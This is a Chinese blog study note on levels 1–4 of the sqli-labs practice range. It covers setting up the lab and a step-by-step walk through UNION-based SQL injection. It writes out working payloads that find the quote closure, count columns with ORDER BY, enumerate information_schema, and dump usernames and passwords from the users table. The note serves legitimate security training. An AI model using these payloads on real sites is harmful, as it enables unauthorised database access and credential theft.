sql-labs闯关 1~4

发布于:2023-02-07 ⋅ 阅读:(2510) ⋅ 点赞:(2)

sql-labs闯关:1~4

友善爱国平等爱国诚信自由敬业友善自由友善爱国平等友善平等友善爱国诚信民主法治

复习笔记1


内容:

  1. 靶场安装
  2. 遇到的问题
  3. 了解sql注入攻击类型
  4. union联合注入步骤思维导图
  5. sql-labs第一关(GET请求-基于错误-单引号-字符型)
  6. sql-labs第二关(GET请求-基于整型)
  7. sql-labs第三关(GET请求-基于错误-变形单引号-字符型)
  8. sql-labs第四关(GET请求-基于错误-双引号-字符型)
  9. 总结

1.搭建环境:

1.安装phpstudy_pro下载地址
2.下载sqlilabs项目源码,放在phpstudy_pro的www目录下,建议把文件夹改成方便记忆的
目录

3.修改db-creds.inc文件参数
参数修改
4.访问创建即可
安装
安装成功
successfully


2.安装时遇到的问题:

PHP版本太高出现不兼容,出现如下图问题
问题1
网上有很多大佬给出的解决办法,我懒得修改就在GitHub上下载了适合php7的sqlilabs源码下载地址

下述方法我还没试过,自行查阅吧
Fatal error: Uncaught Error: Call to undefined function mysql_connect()问题解决
sqli-labs靶场搭建过程及报错解决方法


3. 了解sql注入攻击类型

思维导图


4.查看union联合注入步骤思维导图:

4.1


5.sql-labs第一关 (目标:通过闯关掌握union联合注入)

4.2.1
输入id=1正常访问
4.2.2
4.2.3
输入?id=1 and 1=1?id=1 and 1=2对比结果,判断是否为数值型,结果不是数值型,再输入?id=1' and '1'='1 ?id=1' and '1'='2
4.2.4
4.2.5
两个结果不同,可以确定其为字符型
4.2.6
在正常的URL后添加单引号,再次访问,查看报错信息。如上图所示,红色方框中第一对单引号是报错内容,第二对单引号是用户输入的内容,第三个单引号是我们输入的,而我们输入的单引号将语句提前闭合,导致语法出现错误,从而产生sql注入漏洞。
4.2.18
如上图,在可以显示报错信息的情况下,使用转义字符也可以快速找出闭合点。
4.2.7
通过添加注释符(–+或%23或–')将多余的单引号注释,使语法正确。

具体原理请查看sql注入中的–+注释问题探索

4.2.8
用order by判断判断字段数,由上图所知,字段数不超过5
4.2.9
由上图所知,字段数小于4
4.2.10
最终确定,字段数为3
4.2.11
用union查询出显示位,由下图可知,2、3位可回显

在MYSQL 5.0版本之后,MYSQL默认在数据库中存放一个“information_schema”的数据库,在该库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。
SCHEMATA表存储所有数据表的库名,字段名为SCHEMA_NAME。
TABLES表存储该用户创建的所有数据库的库名和表名,字段名为TABLE_SCHEMA和TABLE_NAME。
COLUMNS表存储该用户创建的所有数据库的库名、表名和字段名,字段名为TABLE_SCHEMA、TABLE_NAME和COLUMN_NAME。
group_concat函数可将多个字段拼接成一个字段,集中显示。(与count函数配合使用,个人满意度5颗星)

?id=-1' union select 1,count(schema_name),group_concat(schema_name) from information_schema.schemata --+

4.2.12
爆出所有库名。(不过在上课期间,没用过此表爆库名)
4.2.13
输入?id=-1' union select 1,database(),version()--+爆数据库名和数据库版本,爆出数据库名为’security’,数据库版本为’5.7.26’

?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' --+

4.2.14
爆出security库下的所有表名(将’security’替换成’database()',效果一样)
初步看表名,这四张表中,'users’表可能会存储用户账号密码,优先尝试拿到users表所有字段名

?id=-1' union select 1,count(column_name),group_concat(column_name) from information_schema.columns where table_name='users'--+

4.2.15
爆出其字段,由上图所知,此表共有14个字段名。

?id=-1' union select 1,count(column_name),group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

4.2.16
通过添加过滤条件,更快捷的找到需要的字段

?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

4.2.17
最后,通过简单的sql查询就可以得到用户账号和密码


6.sql-labs第二关

5.1
正常输入
5.2
5.3
输入?id=1 and 1=1 和?id=1 and 1=2查看结果,确定其为数值型
5.4
5.5
通过上一关知道有三列,经过上面两张结果也可以确定
5.6
查看回显位
5.7
输入?id=0 union select 1,database(),version()爆库名

?id=0 union select 1,count(table_name),group_concat(table_name) from information_schema.tables where table_schema=database()

5.8
爆表名

?id=0 union select 1,count(column_name),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'

5.9
爆字段

?id=0 union select 1,group_concat(username),group_concat(password) from users

5.10
得到数据


7.sql-labs第三关

6.1
正常输入
6.2
输入转义字符,快速查看闭合点,得到闭合点为’)
6.3
测试闭合点是否正确
6.4
order by 判断列数
6.5
确定回显位
6.6
爆库和版本
6.7
爆表
6.8
爆字段
6.9
爆数据


8.sql-labs第四关

6.1
正常输入
6.2
确定回显位
6.3
爆库
6.4
爆表
6.5
爆字段
6.6
爆数据


9.总结

通过四关的闯关,可以了解掌握union联合注入的步骤,虽然用转义字符可以快速找到闭合点,但是在没有回显的时候就没作用了,所以为了熟练掌握,建议在练习的时候使用单引号判断法、双引号判断法多试试,多熟悉熟悉常用的闭合点。
第五关盲注,放在下篇文章

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到